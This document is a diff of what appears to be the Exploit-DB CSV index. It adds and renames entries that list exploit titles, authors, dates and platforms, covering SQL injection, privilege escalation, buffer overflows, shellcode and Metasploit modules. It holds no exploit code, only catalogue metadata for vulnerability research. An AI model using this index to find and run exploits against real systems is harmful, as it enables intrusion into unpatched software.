20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services (Windows 2000) - File Verification",2000-11-10,"Georgi Guninski",windows,remote,0
20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Denial of Service",2000-11-10,sozni,cgi,dos,0
@ -18005,6 +18008,7 @@ id,file,description,date,author,platform,type,port
20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0
20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (1)",2001-03-08,anonymous,unix,local,0
20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (2)",2001-03-08,"the itch",unix,local,0
40426,platforms/windows/local/40426.txt,"MSI - NTIOLib.sys / WinIO.sys Local Privilege Escalation",2016-09-26,ReWolf,windows,local,0
20680,platforms/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 - Telnet Client File Overwrite",2001-03-09,"Oliver Friedrichs",windows,remote,0
20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos,0
20682,platforms/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - Denial of Service",2001-03-09,Phiber,windows,dos,0
@ -18036,6 +18040,7 @@ id,file,description,date,author,platform,type,port
20720,platforms/linux/local/20720.c,"Linux Kernel 2.2.18 (RedHat 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
20721,platforms/linux/local/20721.c,"Linux Kernel 2.2.18 (RedHat 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 - JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0
40425,platforms/windows/local/40425.txt,"Elantech-Smart Pad 11.9.0.0 - Unquoted Service Path Privilege Escalation",2016-09-26,zaeek,windows,local,0
20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 - User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0
20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 Beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local,0
20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Arbitrary Commands",2001-04-02,"UkR hacking team",cgi,remote,0
@ -18075,6 +18080,7 @@ id,file,description,date,author,platform,type,port
20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0
20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0
20764,platforms/solaris/remote/20764.txt,"Solaris 2.6 - FTP Core Dump Shadow Password Recovery",2001-04-17,warning3,solaris,remote,0
40423,platforms/php/webapps/40423.txt,"Joomla! Component Event Booking 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",php,webapps,80
20765,platforms/linux/remote/20765.pl,"Linux Kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",linux,remote,0
20766,platforms/unix/local/20766.c,"SGI IRIX 6.5 / Solaris 7.0/8 - CDE dtsession Buffer Overflow",2001-04-11,"Last Stage of Delirium",unix,local,0
20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0
@ -18122,6 +18128,7 @@ id,file,description,date,author,platform,type,port
20810,platforms/multiple/dos/20810.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)",1997-11-20,m3lt,multiple,dos,0
20811,platforms/multiple/dos/20811.cpp,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)",1997-11-20,"Konrad Malewski",multiple,dos,0
20812,platforms/windows/dos/20812.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)",1997-11-20,m3lt,windows,dos,0
40422,platforms/windows/local/40422.txt,"NetDrive 2.6.12 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local,0
20813,platforms/multiple/dos/20813.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)",1997-11-20,MondoMan,multiple,dos,0
20814,platforms/windows/dos/20814.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)",1997-11-20,"Dejan Levaja",windows,dos,0
20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (1)",2001-05-01,storm,windows,remote,0
@ -18718,7 +18725,7 @@ id,file,description,date,author,platform,type,port
21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting",2002-04-17,frog,php,webapps,0
21428,platforms/php/dos/21428.txt,"Messagerie 1.0 - Arbitrary User Removal Denial of Service",2002-04-27,frog,php,dos,0
21429,platforms/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow (1)",2002-04-15,"MaD SKiLL",windows,dos,0
22216,platforms/php/webapps/22216.txt,"bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0
22216,platforms/php/webapps/22216.txt,"Bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0
21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service",2002-04-12,"Marcelo Magnasco",irix,dos,0
21432,platforms/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character Denial of Service",2002-04-30,"Peter Gründl",windows,dos,0
21433,platforms/cgi/webapps/21433.txt,"MyGuestbook 1.0 - Script Injection",2002-04-30,BrainRawt,cgi,webapps,0
@ -18965,6 +18972,8 @@ id,file,description,date,author,platform,type,port
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40364,platforms/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",php,webapps,80
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
40366,platforms/php/webapps/40366.txt,"Contrexx CMS egov Module 1.0.0 - SQL Injection",2016-09-13,"hamidreza borghei",php,webapps,80
40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
40367,platforms/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
@ -19432,11 +19441,11 @@ id,file,description,date,author,platform,type,port
22152,platforms/php/webapps/22152.txt,"Joomla! Plugin Commedia - 'index.php task Parameter' SQL Injection",2012-10-22,D4NB4R,php,webapps,0
22153,platforms/php/webapps/22153.pl,"Joomla! Component Kunena - 'index.php search Parameter' SQL Injection",2012-10-22,D35m0nd142,php,webapps,0
22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0
22156,platforms/php/webapps/22156.txt,"White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0
22156,platforms/php/webapps/22156.txt,"Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0
22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id Parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0
22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0
22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0
22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0
22160,platforms/php/webapps/22160.txt,"ATutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0
22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 - PORT Overflow (Metasploit)",2012-10-23,Metasploit,windows,remote,21
22162,platforms/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 - ICMP Packet Flood Denial of Service",2003-01-13,"Pavel P",windows,dos,0
22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 - profiles.php Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0
@ -19593,7 +19602,7 @@ id,file,description,date,author,platform,type,port
22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0
22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0
22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps,0
40413,platforms/php/webapps/40413.txt,"Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80
40413,platforms/php/webapps/40413.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80
22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - Defines.php Remote File Inclusion",2003-03-03,frog,php,webapps,0
22319,platforms/hardware/remote/22319.txt,"HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",hardware,remote,0
22320,platforms/linux/local/22320.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0
@ -20737,7 +20746,7 @@ id,file,description,date,author,platform,type,port
23491,platforms/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1)",2003-12-29,fiNis,windows,remote,0
23492,platforms/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,windows,remote,0
23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote,0
23494,platforms/php/webapps/23494.txt,"Clockstone and other CMSMasters Theme - Arbitrary File Upload",2012-12-19,DigiP,php,webapps,0
23494,platforms/php/webapps/23494.txt,"Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload",2012-12-19,DigiP,php,webapps,0
23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 - File Disclosure",2004-01-31,"Zero X",php,webapps,0
23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",windows,dos,0
23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0
@ -22465,7 +22474,7 @@ id,file,description,date,author,platform,type,port
25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.30 / 2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation",2005-10-19,backdoored.net,linux,local,0
25291,platforms/multiple/remote/25291.txt,"Tincat Network Library - Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0
25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0
25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80
25775,platforms/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80
25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0
25296,platforms/windows/local/25296.rb,"AudioCoder - '.m3u' Buffer Overflow (Metasploit)",2013-05-07,Metasploit,windows,local,0
25297,platforms/linux/remote/25297.txt,"Dovecot with Exim sender_address Parameter - Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0
@ -22959,6 +22968,7 @@ id,file,description,date,author,platform,type,port
33418,platforms/php/webapps/33418.txt,"Joomla! Component com_joomportfolio - 'secid' Parameter SQL Injection",2009-12-17,"Fl0riX and Snakespc",php,webapps,0
33419,platforms/php/webapps/33419.txt,"F3Site 2009 - mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
33420,platforms/php/webapps/33420.txt,"F3Site 2009 - mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
40390,platforms/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,php,webapps,80
33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injection",2009-12-18,R3d-D3V!L,php,webapps,0
33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0
33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
@ -23618,7 +23628,7 @@ id,file,description,date,author,platform,type,port
26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21
26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation (Metasploit)",2013-06-26,Metasploit,linux,local,0
26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - nicm.sys Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local,0
26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 - (index.php type Parameter) Remote Code Execution",2013-06-26,infodox,php,webapps,0
26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - (index.php type Parameter) Remote Code Execution",2013-06-26,infodox,php,webapps,0
26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)",2013-06-26,Metasploit,freebsd,local,0
26455,platforms/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0
26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 - post.php SQL Injection",2005-11-01,almaster,php,webapps,0
@ -24442,7 +24452,7 @@ id,file,description,date,author,platform,type,port
27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash (PoC)",2013-08-02,d3b4g,windows,dos,0
27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0
27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,"cr4wl3r ",php,webapps,0
27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
27276,platforms/php/webapps/27276.html,"BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0
27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0
27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0
@ -25029,7 +25039,7 @@ id,file,description,date,author,platform,type,port
27886,platforms/php/webapps/27886.txt,"Sphider 1.3 - search.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0
27887,platforms/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 - Input Validation",2005-11-09,"Arnold Grossmann",multiple,remote,0
27888,platforms/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 - Viewfile Information Disclosure",2006-05-16,"Joseph Pierini",java,webapps,0
27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 - admin.php Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0
27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 - 'admin.php' Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0
27890,platforms/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting",2006-05-17,LiNuX_rOOt,asp,webapps,0
27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",hardware,remote,0
27892,platforms/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
@ -25503,7 +25513,7 @@ id,file,description,date,author,platform,type,port
28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Privilege Escalation",2006-08-18,Netragard,linux,local,0
28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0
28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0
28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (1)",2013-09-20,xistence,php,remote,0
28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0
28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser Parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0
28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0
@ -26110,7 +26120,7 @@ id,file,description,date,author,platform,type,port
29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 - get_password.php Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0
29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0
29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0
29020,platforms/php/webapps/29020.txt,"Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80
29020,platforms/php/webapps/29020.txt,"Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80
29021,platforms/php/webapps/29021.txt,"WordPress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80
29023,platforms/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon - SQL Injection",2013-10-17,"Easy Laster",php,webapps,0
29024,platforms/asp/webapps/29024.txt,"Inventory Manager - Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0
@ -26580,7 +26590,7 @@ id,file,description,date,author,platform,type,port
30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0
30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.asp Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0
30049,platforms/windows/remote/30049.html,"LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote,0
30050,platforms/php/webapps/30050.html,"Redoable 1.2 Theme - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0
30050,platforms/php/webapps/30050.html,"Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0
30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - Server.php Full Path Disclosure",2007-05-17,kefka,php,webapps,0
30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0
30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0
@ -27632,7 +27642,7 @@ id,file,description,date,author,platform,type,port
30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0
30635,platforms/windows/remote/30635.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",windows,remote,0
30636,platforms/windows/remote/30636.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0
30637,platforms/php/webapps/30637.js,"Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0
30637,platforms/php/webapps/30637.js,"Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0
30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0
30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0
@ -27652,7 +27662,7 @@ id,file,description,date,author,platform,type,port
30653,platforms/php/webapps/30653.txt,"phpMyAdmin 2.11.1 - setup.php Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps,0
30654,platforms/php/webapps/30654.txt,"ActiveKB NX 2.6 - 'index.php' Cross-Site Scripting",2007-10-11,durito,php,webapps,0
30655,platforms/php/webapps/30655.txt,"Joomla! Component Search 1.0.13 - SearchWord Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0
30656,platforms/php/webapps/30656.txt,"boastMachine 2.8 - 'index.php' Local File Inclusion",2007-10-11,iNs,php,webapps,0
30656,platforms/php/webapps/30656.txt,"BoastMachine 2.8 - 'index.php' Local File Inclusion",2007-10-11,iNs,php,webapps,0
30657,platforms/php/webapps/30657.txt,"UMI CMS - 'index.php' Cross-Site Scripting",2007-10-11,anonymous,php,webapps,0
30658,platforms/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0
30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0
@ -30664,7 +30674,7 @@ id,file,description,date,author,platform,type,port
33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access",2010-02-24,nks,windows,remote,0
33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting",2010-01-20,"cr4wl3r ",php,webapps,0
33937,platforms/multiple/webapps/33937.txt,"TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0
33937,platforms/multiple/webapps/33937.txt,"Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0
33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Parameter Cross-Site Scripting",2010-02-04,"Karn Ganeshen",hardware,remote,0
33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Parameter Cross-Site Scripting",2010-02-06,"cp77fk4r ",java,webapps,0
33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x - URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote,0
@ -30819,7 +30829,7 @@ id,file,description,date,author,platform,type,port
34113,platforms/php/webapps/34113.py,"Silverstripe CMS 2.4 - File Renaming Security Bypass",2010-06-09,"John Leitch",php,webapps,0
34105,platforms/php/webapps/34105.txt,"WordPress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80
34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager - 'target' Parameter Local File Inclusion",2010-06-07,"AnTi SeCuRe",php,webapps,0
34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0
34107,platforms/php/webapps/34107.txt,"BoastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0
34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps,0
34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",php,webapps,0
34110,platforms/php/webapps/34110.txt,"PG Auto Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0
@ -30971,7 +30981,7 @@ id,file,description,date,author,platform,type,port
34291,platforms/php/webapps/34291.txt,"Joomla! Component Rapid-Recipe - HTML Injection",2010-07-10,Sid3^effects,php,webapps,0
34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Parameter Cross-Site Scripting",2010-07-12,"David K",java,webapps,0
34294,platforms/php/webapps/34294.txt,"Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0
34294,platforms/php/webapps/34294.txt,"Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0
34295,platforms/php/webapps/34295.txt,"RunCMS 2.1 - 'magpie_debug.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0
34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0
34297,platforms/multiple/remote/34297.txt,"dotDefender - Cross-Site Scripting Security Bypass",2010-07-09,SH4V,multiple,remote,0
@ -31085,7 +31095,7 @@ id,file,description,date,author,platform,type,port
34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - (search.php cat Parameter) SQL Injection",2014-09-03,D35m0nd142,php,webapps,80
34426,platforms/linux/remote/34426.txt,"uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,linux,remote,0
34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",linux,dos,0
